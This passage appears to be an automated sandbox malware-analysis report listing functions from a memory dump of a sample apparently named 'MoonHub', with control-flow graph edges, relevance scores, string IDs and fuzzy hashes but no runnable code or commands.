                                                                                                                                                                                • Opcode Fuzzy Hash: b922415630dc8b70cb959ceacc69aeaca1cd0651fbb9f900f3f0bcb3dc292cbe
                                                                                                                                                                                • Instruction Fuzzy Hash: 5812E331A0DA0A9FD788EF2C98556BA77E1FF99750F1441BED04AC7292DF389C428B44
                                                                                                                                                                                Function 00007FF848EA7857 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f69335887c37af3fcef454ab188f4af5c19d278adee3ea2b958205b316e56065
                                                                                                                                                                                • Instruction ID: d8daff6f5f28dae1d948e7cb47a5be1c875881e722e7d742f3261a84c4c5a178
                                                                                                                                                                                • Opcode Fuzzy Hash: f69335887c37af3fcef454ab188f4af5c19d278adee3ea2b958205b316e56065
                                                                                                                                                                                • Instruction Fuzzy Hash: 16A10031A0DB469FE78CEA2C98156B577D2FF96750B0441BED04AC72E2EF389C028B45
                                                                                                                                                                                Function 00007FF848E9909F Relevance: 17.9, Strings: 14, Instructions: 407COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$@[=j$H[=j$P[=j$X[=j$`[=j$h[=j$p[=j
                                                                                                                                                                                • API String ID: 0-567507759
                                                                                                                                                                                • Opcode ID: 69b030a29903e7283870e2c1d1142ca91345135ca51b8c99edd351f9b2e0a608
                                                                                                                                                                                • Instruction ID: f793cbfe0345c48d97aecbc8abc9fd21750fbaa7bb963502568a3e9956e6ce42
                                                                                                                                                                                • Opcode Fuzzy Hash: 69b030a29903e7283870e2c1d1142ca91345135ca51b8c99edd351f9b2e0a608
                                                                                                                                                                                • Instruction Fuzzy Hash: 25D11661D0EAC65FE78AFA7858156E97BE1FF06264F0804FAD08ACB0D3EA6C5C458351
                                                                                                                                                                                Function 00007FF848E99530 Relevance: 11.7, Strings: 9, Instructions: 465COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$[=jV$j
                                                                                                                                                                                • API String ID: 0-994020929
                                                                                                                                                                                • Opcode ID: b21c7052639e953ebee2e0f082d74af4157a0b84678b532814723f8bbbd23753
                                                                                                                                                                                • Instruction ID: f6eb13fb98109025ba81e2ef624675785d0481a1cdb36ef3b85a324bb9abb074
                                                                                                                                                                                • Opcode Fuzzy Hash: b21c7052639e953ebee2e0f082d74af4157a0b84678b532814723f8bbbd23753
                                                                                                                                                                                • Instruction Fuzzy Hash: D1F14661C0EAC69FE796BB7848156EA7BE0FF06354F0804FDD0898B1A7EE6C5C058315
                                                                                                                                                                                Function 00007FF848EA8EAA Relevance: 11.5, Strings: 9, Instructions: 279COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 502 7ff848ea8eaa-7ff848ea8ec9 505 7ff848ea8ecb-7ff848ea8ed0 502->505 506 7ff848ea8e6d-7ff848ea8ea9 502->506 505->506 508 7ff848ea8ed2-7ff848ea8ff1 call 7ff848ea8b30 505->508 528 7ff848ea8ff3-7ff848ea9005 508->528 529 7ff848ea904d-7ff848ea9051 508->529 530 7ff848ea90f0-7ff848ea90ff 528->530 532 7ff848ea900b-7ff848ea902b 528->532 529->530 531 7ff848ea9057-7ff848ea9077 529->531 538 7ff848ea9102-7ff848ea910d 530->538 539 7ff848ea9101 530->539 531->530 534 7ff848ea9079-7ff848ea9099 531->534 532->530 533 7ff848ea9031-7ff848ea9047 532->533 533->529 534->530 535 7ff848ea909b-7ff848ea90bb 534->535 535->530 537 7ff848ea90bd-7ff848ea90dd 535->537 537->530 540 7ff848ea90df-7ff848ea90ef 537->540 541 7ff848ea910f-7ff848ea9121 call 7ff848ea15a0 538->541 539->538 543 7ff848ea9126-7ff848ea9128 541->543 544 7ff848ea9135-7ff848ea921a 543->544 545 7ff848ea912a-7ff848ea9134 543->545 552 7ff848ea9264-7ff848ea927c 544->552 553 7ff848ea921c-7ff848ea9232 544->553 554 7ff848ea9234-7ff848ea9237 553->554 555 7ff848ea928b-7ff848ea92ac 553->555 557 7ff848ea92b8-7ff848ea92de 554->557 558 7ff848ea9239-7ff848ea9240 554->558 560 7ff848ea92f6-7ff848ea930b 555->560 561 7ff848ea92ae-7ff848ea92b6 555->561 563 7ff848ea92e0-7ff848ea92e2 557->563 564 7ff848ea935f-7ff848ea936e 557->564 558->552 579 7ff848ea9312-7ff848ea9315 call 7ff848ea58c0 560->579 561->557 566 7ff848ea92e4-7ff848ea92ea 563->566 567 7ff848ea935e 563->567 571 7ff848ea9370-7ff848ea9375 564->571 576 7ff848ea932c-7ff848ea9335 566->576 577 7ff848ea92ec-7ff848ea92f4 566->577 567->564 573 7ff848ea9377 571->573 574 7ff848ea9378-7ff848ea938d 571->574 573->574 578 7ff848ea938f-7ff848ea93af 574->578 583 7ff848ea9337-7ff848ea9357 576->583 584 7ff848ea937f-7ff848ea938d 576->584 577->560 577->571 581 7ff848ea93b1-7ff848ea93cb call 7ff848ea15f0 578->581 582 7ff848ea93dd-7ff848ea93e0 578->582 589 7ff848ea931a-7ff848ea932b call 7ff848ea932c 579->589 593 7ff848ea93d0-7ff848ea93db 581->593 586 7ff848ea93e2-7ff848ea93ee 582->586 584->578 593->586
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j
                                                                                                                                                                                • API String ID: 0-2630587675
                                                                                                                                                                                • Opcode ID: 98c8224275db32841cd3af9882ccd1f2e26753c36a4ff9ec31825650ca0e1c2d
                                                                                                                                                                                • Instruction ID: da997706a73ffaf82727477d8ec4a983ceff72510fdbe89e63e76fbad1b6e0e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 98c8224275db32841cd3af9882ccd1f2e26753c36a4ff9ec31825650ca0e1c2d
                                                                                                                                                                                • Instruction Fuzzy Hash: B991FB3190D7969FE343E7748899AA67BE0FF02750F4805FAC45ACB0A3EA2C2846C755
                                                                                                                                                                                Function 00007FF848E99EE6 Relevance: 10.0, Strings: 7, Instructions: 1237COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 596 7ff848e99ee6-7ff848e99ef6 597 7ff848e99efc-7ff848e99f28 596->597 600 7ff848e9a7e7-7ff848e9a80e call 7ff848e98678 597->600 601 7ff848e99f2e-7ff848e99f3e 597->601 607 7ff848e9a813 600->607 602 7ff848e99f40-7ff848e99f4b 601->602 603 7ff848e99f94-7ff848e99fac call 7ff848e97780 601->603 608 7ff848e99ed2-7ff848e99ede 602->608 609 7ff848e99f4d-7ff848e99f92 602->609 618 7ff848e99fb0-7ff848e99fb3 603->618 613 7ff848e9a818-7ff848e9a81d call 7ff848e98688 607->613 611 7ff848e99ee0 608->611 612 7ff848e99e68-7ff848e99e93 608->612 609->603 611->596 625 7ff848e9a6c2-7ff848e9a7d0 612->625 626 7ff848e99e99-7ff848e99eb6 612->626 624 7ff848e9a822-7ff848e9a83b call 7ff848e986a0 613->624 618->613 621 7ff848e99fb9-7ff848e9a02a 618->621 621->618 640 7ff848e9a02c-7ff848e9a048 621->640 632 7ff848e9a840 624->632 720 7ff848e9a7da-7ff848e9a7dd call 7ff848e973a0 625->720 633 7ff848e99eb8-7ff848e99ede 626->633 634 7ff848e99e3e-7ff848e99e67 626->634 638 7ff848e9a845-7ff848e9a871 call 7ff848e986b0 632->638 633->611 633->612 634->612 649 7ff848e9a8a0-7ff848e9a8b1 638->649 640->624 648 7ff848e9a04e-7ff848e9a05e 640->648 652 7ff848e9a060-7ff848e9a0b2 648->652 653 7ff848e9a0b4-7ff848e9a0d3 call 7ff848e97780 648->653 654 7ff848e9a8b3 649->654 655 7ff848e9a8b8-7ff848e9a8db 649->655 652->653 653->638 671 7ff848e9a0d9-7ff848e9a0e9 653->671 654->655 658 7ff848e9a957-7ff848e9a968 655->658 659 7ff848e9a8dd-7ff848e9a924 655->659 662 7ff848e9a96a 658->662 663 7ff848e9a96f-7ff848e9a9aa 658->663 659->658 662->663 672 7ff848e9aa26-7ff848e9aa37 663->672 673 7ff848e9a9ac-7ff848e9a9f3 663->673 675 7ff848e9a0eb-7ff848e9a13d 671->675 676 7ff848e9a13f-7ff848e9a44b call 7ff848e97780 671->676 677 7ff848e9aa39 672->677 678 7ff848e9aa3e-7ff848e9aa79 672->678 673->672 675->676 676->649 789 7ff848e9a451-7ff848e9a48f call 7ff848e98910 676->789 677->678 686 7ff848e9aaf5-7ff848e9ab06 678->686 687 7ff848e9aa7b-7ff848e9aac2 678->687 690 7ff848e9ab08 686->690 691 7ff848e9ab0d-7ff848e9ab48 686->691 687->686 690->691 701 7ff848e9abc4-7ff848e9abd5 691->701 702 7ff848e9ab4a-7ff848e9ab91 691->702 703 7ff848e9abd7 701->703 704 7ff848e9abdc-7ff848e9ac17 701->704 702->701 703->704 711 7ff848e9ac93-7ff848e9aca4 704->711 712 7ff848e9ac19-7ff848e9ac60 704->712 715 7ff848e9aca6 711->715 716 7ff848e9acab-7ff848e9acec 711->716 712->711 715->716 722 7ff848e9ad68-7ff848e9ad79 716->722 723 7ff848e9acee-7ff848e9ad5e 716->723 728 7ff848e9a7e2 720->728 726 7ff848e9ad80-7ff848e9adc1 722->726 727 7ff848e9ad7b 722->727 723->722 734 7ff848e9adc3-7ff848e9ae08 726->734 735 7ff848e9ae3d-7ff848e9ae4e 726->735 727->726 728->728 734->735 736 7ff848e9ae50 735->736 737 7ff848e9ae55-7ff848e9ae97 735->737 736->737 745 7ff848e9af12-7ff848e9af5a 737->745 746 7ff848e9ae99-7ff848e9af08 737->746 756 7ff848e9af6a-7ff848e9afa8 745->756 757 7ff848e9af5c-7ff848e9af60 745->757 746->745 759 7ff848e9afdb-7ff848e9b072 756->759 758 7ff848e9af62-7ff848e9af66 757->758 757->759 758->756 773 7ff848e9db4e-7ff848e9db57 759->773 789->773
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ \=j$H$H
                                                                                                                                                                                • API String ID: 0-2237833136
                                                                                                                                                                                • Opcode ID: 51e880bbad29550e2c506d4f89ecd80dcbb7b6b27bf78ec606b19cfdfc536f45
                                                                                                                                                                                • Instruction ID: 89faf412f9c09bcc553aea2afe62fa7ef5ea4b57a989ca265a1cfa478fee54af
                                                                                                                                                                                • Opcode Fuzzy Hash: 51e880bbad29550e2c506d4f89ecd80dcbb7b6b27bf78ec606b19cfdfc536f45
                                                                                                                                                                                • Instruction Fuzzy Hash: A6A27134A19A4E9FDB88EF58C895BEAB7E1FF58340F1445B9E409C7296DB34E841CB40
                                                                                                                                                                                Function 00007FF848E98DA9 Relevance: 7.9, Strings: 6, Instructions: 448COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$([=j$0[=j$8[=j
                                                                                                                                                                                • API String ID: 0-1191698884
                                                                                                                                                                                • Opcode ID: 029d24e44c3885eb9a667719fb42b720fc7cd931c8f0c4fc0ee12ff9820c97e6
                                                                                                                                                                                • Instruction ID: 729b8b3489fa7a4632b76c79c0a300ea6d0ac56257a28b0b3ba27ac75a2f7155
                                                                                                                                                                                • Opcode Fuzzy Hash: 029d24e44c3885eb9a667719fb42b720fc7cd931c8f0c4fc0ee12ff9820c97e6
                                                                                                                                                                                • Instruction Fuzzy Hash: A0D10420A0E99E5FE789FA7898152BD36D2FF95794F0404B9E04DC72D7EE6C5C028341
                                                                                                                                                                                Function 00007FF848E99C73 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1075 7ff848e99c73-7ff848e99c79 1076 7ff848e9a4e5-7ff848e9a5ac 1075->1076 1077 7ff848e99c7f-7ff848e99c98 1075->1077 1133 7ff848e9a5b3-7ff848e9a5b9 call 7ff848e97218 1076->1133 1081 7ff848e99cf5-7ff848e99d4c 1077->1081 1082 7ff848e99c9a-7ff848e99cd4 1077->1082 1100 7ff848e99d4f-7ff848e99d69 1081->1100 1092 7ff848e9a6a4 call 7ff848e98600 1082->1092 1093 7ff848e99cda-7ff848e99cf3 1082->1093 1099 7ff848e9a6a9 1092->1099 1093->1081 1099->1100 1104 7ff848e99d6f-7ff848e99dfe 1100->1104 1105 7ff848e9a6ae-7ff848e9a6b3 call 7ff848e98630 1100->1105 1113 7ff848e9a6b8 call 7ff848e98660 1104->1113 1121 7ff848e99e04-7ff848e99e43 1104->1121 1105->1113 1115 7ff848e9a6bd 1113->1115 1115->1115 1121->1076 1133->1092
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$[=j
                                                                                                                                                                                • API String ID: 0-2958635295
                                                                                                                                                                                • Opcode ID: 961326dd203bad2fdc2135dd51acb8af2420e682c3209652b8c00ed3ca9f1402
                                                                                                                                                                                • Instruction ID: 332a8292689e6c9b30c1cbbea2552c7b4a510d0476c738ff0d6ef0431094d14f
                                                                                                                                                                                • Opcode Fuzzy Hash: 961326dd203bad2fdc2135dd51acb8af2420e682c3209652b8c00ed3ca9f1402
                                                                                                                                                                                • Instruction Fuzzy Hash: 1981C510E4F98F6FE68ABAB894152FD36D2EF55684F1404B9D09EC71D7EE6C6C018341
                                                                                                                                                                                Function 00007FF848E99A69 Relevance: 5.2, Strings: 4, Instructions: 209COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1137 7ff848e99a69-7ff848e99a80 1139 7ff848e99a86-7ff848e99b15 1137->1139 1140 7ff848e9a67c-7ff848e9a681 call 7ff848e98540 1137->1140 1146 7ff848e9a686-7ff848e9a68b call 7ff848e98570 1139->1146 1154 7ff848e99b1b-7ff848e99ba1 1139->1154 1140->1146 1151 7ff848e9a690 call 7ff848e985a0 1146->1151 1155 7ff848e9a695 1151->1155 1168 7ff848e99bb3-7ff848e99c21 1154->1168 1169 7ff848e99ba3-7ff848e99baa 1154->1169 1157 7ff848e99c25-7ff848e99c3f 1155->1157 1161 7ff848e99c45-7ff848e99c60 1157->1161 1162 7ff848e9a69a call 7ff848e985d0 1157->1162 1161->1140 1166 7ff848e9a69f 1162->1166 1166->1166 1170 7ff848e99bab-7ff848e99bb2 1168->1170 1176 7ff848e99c23 1168->1176 1169->1151 1169->1170 1170->1168 1176->1157
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$[=j
                                                                                                                                                                                • API String ID: 0-2958635295
                                                                                                                                                                                • Opcode ID: d58a6e7c0bc1bcd3cdfbbe97988437b1f02ba4a3d6e2c239db93e795cdd871d5
                                                                                                                                                                                • Instruction ID: b93e9e86833e251b6555d8892b194ba114eb282a5f802bab9c7e17fe6afed984
                                                                                                                                                                                • Opcode Fuzzy Hash: d58a6e7c0bc1bcd3cdfbbe97988437b1f02ba4a3d6e2c239db93e795cdd871d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 4171F761C0EBC69FE396B77848156E67BE1FF06254F0804FED0898B1E7EABC58458315
                                                                                                                                                                                Function 00007FF848EA530F Relevance: 4.0, Strings: 3, Instructions: 239COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1285 7ff848ea530f-7ff848ea535a 1287 7ff848ea53a4-7ff848ea53bc 1285->1287 1288 7ff848ea535c-7ff848ea5372 1285->1288 1289 7ff848ea5374-7ff848ea5377 1288->1289 1290 7ff848ea53cb-7ff848ea53ec 1288->1290 1292 7ff848ea5379-7ff848ea5380 1289->1292 1293 7ff848ea53f8-7ff848ea5419 1289->1293 1294 7ff848ea5436 1290->1294 1295 7ff848ea53ee-7ff848ea53f6 1290->1295 1292->1287 1298 7ff848ea5472-7ff848ea5475 1293->1298 1299 7ff848ea541b-7ff848ea541e 1293->1299 1296 7ff848ea5478-7ff848ea5497 1294->1296 1297 7ff848ea5438-7ff848ea544b 1294->1297 1295->1293 1323 7ff848ea5452-7ff848ea5455 call 7ff848ea32c0 1297->1323 1300 7ff848ea5477 1298->1300 1301 7ff848ea54bf-7ff848ea54cd 1298->1301 1303 7ff848ea5420-7ff848ea5422 1299->1303 1304 7ff848ea549f-7ff848ea54a3 1299->1304 1300->1296 1305 7ff848ea54cf-7ff848ea5515 call 7ff848ea3308 1301->1305 1309 7ff848ea5424-7ff848ea5428 1303->1309 1310 7ff848ea549e 1303->1310 1307 7ff848ea54a4-7ff848ea54a5 1304->1307 1308 7ff848ea54a6-7ff848ea54a9 1304->1308 1307->1308 1312 7ff848ea54aa-7ff848ea54ae 1308->1312 1309->1307 1315 7ff848ea542a 1309->1315 1310->1304 1316 7ff848ea54b0-7ff848ea54b5 1312->1316 1319 7ff848ea546c-7ff848ea5470 1315->1319 1320 7ff848ea542c-7ff848ea542e 1315->1320 1321 7ff848ea54b7 1316->1321 1322 7ff848ea54b8-7ff848ea54cd 1316->1322 1319->1298 1320->1312 1324 7ff848ea5430 1320->1324 1321->1322 1322->1305 1328 7ff848ea545a-7ff848ea546b call 7ff848ea546c 1323->1328 1324->1298 1327 7ff848ea5432-7ff848ea5434 1324->1327 1327->1294 1327->1316
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P`=j$X`=j$``=j
                                                                                                                                                                                • API String ID: 0-2140007580
                                                                                                                                                                                • Opcode ID: 66e93420953927d86dbb60aa91ea6c2a3e7ae8f31c047827e96491b2922bdbe9
                                                                                                                                                                                • Instruction ID: d58b921e2f7de9bb5f32ed3039530c0b5e423f89bc3718de86dfb71428975de4
                                                                                                                                                                                • Opcode Fuzzy Hash: 66e93420953927d86dbb60aa91ea6c2a3e7ae8f31c047827e96491b2922bdbe9
                                                                                                                                                                                • Instruction Fuzzy Hash: 6361253280DB895FE765B77458151E97FE0FF42B61F0901FAD489CB093DB2C250A8396
                                                                                                                                                                                Function 00007FF848EA345E Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1331 7ff848ea345e-7ff848ea348a 1334 7ff848ea3490-7ff848ea34a8 call 7ff848e97280 1331->1334 1335 7ff848ea353f-7ff848ea3541 1331->1335 1343 7ff848ea3516-7ff848ea3527 1334->1343 1344 7ff848ea34aa-7ff848ea34e1 1334->1344 1336 7ff848ea3547-7ff848ea3613 1335->1336 1337 7ff848ea3a0e-7ff848ea3a17 call 7ff848ea1960 1335->1337 1336->1337 1342 7ff848ea3a1c-7ff848ea3a4d 1337->1342 1349 7ff848ea3a50-7ff848ea3a59 1342->1349 1345 7ff848ea3529 1343->1345 1346 7ff848ea352e-7ff848ea353c 1343->1346 1352 7ff848ea34e3-7ff848ea34e5 call 7ff848ea3060 1344->1352 1353 7ff848ea34e2 1344->1353 1345->1346 1346->1335 1352->1353 1359 7ff848ea34e9 1352->1359 1353->1352 1359->1349
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H0H$_=j$_=j
                                                                                                                                                                                • API String ID: 0-3519045170
                                                                                                                                                                                • Opcode ID: 5e3ec3ca3d23f738a117b5a08826f05815d821750f5ca96ad62d9b757114ec65
                                                                                                                                                                                • Instruction ID: 598fb793728269cc5bf2f69a7ee99fad8407a3216a3d53cdb660b0a440351aa4
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e3ec3ca3d23f738a117b5a08826f05815d821750f5ca96ad62d9b757114ec65
                                                                                                                                                                                • Instruction Fuzzy Hash: 5561E73090DA8A9FD785EF28C8556EAB7E1FF45750F1404B9E44ACB296DB399802C740
                                                                                                                                                                                Function 00007FF848E99478 Relevance: 3.8, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$p[=j$x[=j
                                                                                                                                                                                • API String ID: 0-693049284
                                                                                                                                                                                • Opcode ID: 7716ec9ed5a1c06c77f556b2afff0384924a9bc3a63b79f7a4486d77943a3fb9
                                                                                                                                                                                • Instruction ID: 159a115c21f9a9f059a093b9ec802de9802d2a882145ef898609744a7f21e30a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7716ec9ed5a1c06c77f556b2afff0384924a9bc3a63b79f7a4486d77943a3fb9
                                                                                                                                                                                • Instruction Fuzzy Hash: 6021F5A1C0EAC65FE39AF67804156A67FE1FF46264B0804FAD049CB197EE6C5C458311
                                                                                                                                                                                Function 00007FF848E9C198 Relevance: 3.1, Strings: 1, Instructions: 1876COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: aK_H
                                                                                                                                                                                • API String ID: 0-2603984226
                                                                                                                                                                                • Opcode ID: cef9594f4ac2260652b284947d9348ba3a56b9884937b4f650d09032539ac22b
                                                                                                                                                                                • Instruction ID: b19e96eeee7ff89bcb79f3d3f8f1986e9581ac91b5590f362afa1f9fd882f05f
                                                                                                                                                                                • Opcode Fuzzy Hash: cef9594f4ac2260652b284947d9348ba3a56b9884937b4f650d09032539ac22b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5AE29170509A8A9FDB85EF68C858BEA77E1FF59314F1804B9D44DCB296DB789C42CB00
                                                                                                                                                                                Function 00007FF848EA15F8 Relevance: 2.9, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j$x6=j
                                                                                                                                                                                • API String ID: 0-4087914330
                                                                                                                                                                                • Opcode ID: 5ca4f7785d54cfa796940be7892146c24eb93a8f9f4cec7d76ec436609c8a778
                                                                                                                                                                                • Instruction ID: 07a2428133c5830dc38eb6fac6795c509da710b4e44d3e803b8b108922d7630e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca4f7785d54cfa796940be7892146c24eb93a8f9f4cec7d76ec436609c8a778
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FC13721A1D7069FE799B66884461BDB7C2FF95B90F50807ED08BC71C7DE3C68828216
                                                                                                                                                                                Function 00007FF848E92731 Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c=j$yR_H
                                                                                                                                                                                • API String ID: 0-240012394
                                                                                                                                                                                • Opcode ID: 4461246e0a68514e475102b9e62400fd3bc9f6b178b3d1d714bff92c71f2dafc
                                                                                                                                                                                • Instruction ID: f7a0f91b92fccc78bdae95f39cd59ea0971b26d9a6addb32e86eeaf061eae6c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 4461246e0a68514e475102b9e62400fd3bc9f6b178b3d1d714bff92c71f2dafc
                                                                                                                                                                                • Instruction Fuzzy Hash: 82A1E432E1CA494FDBA4EB2C98456B9B7E1FB99790F04027AD05ED3246DF34AC424785
                                                                                                                                                                                Function 00007FF848EA1598 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
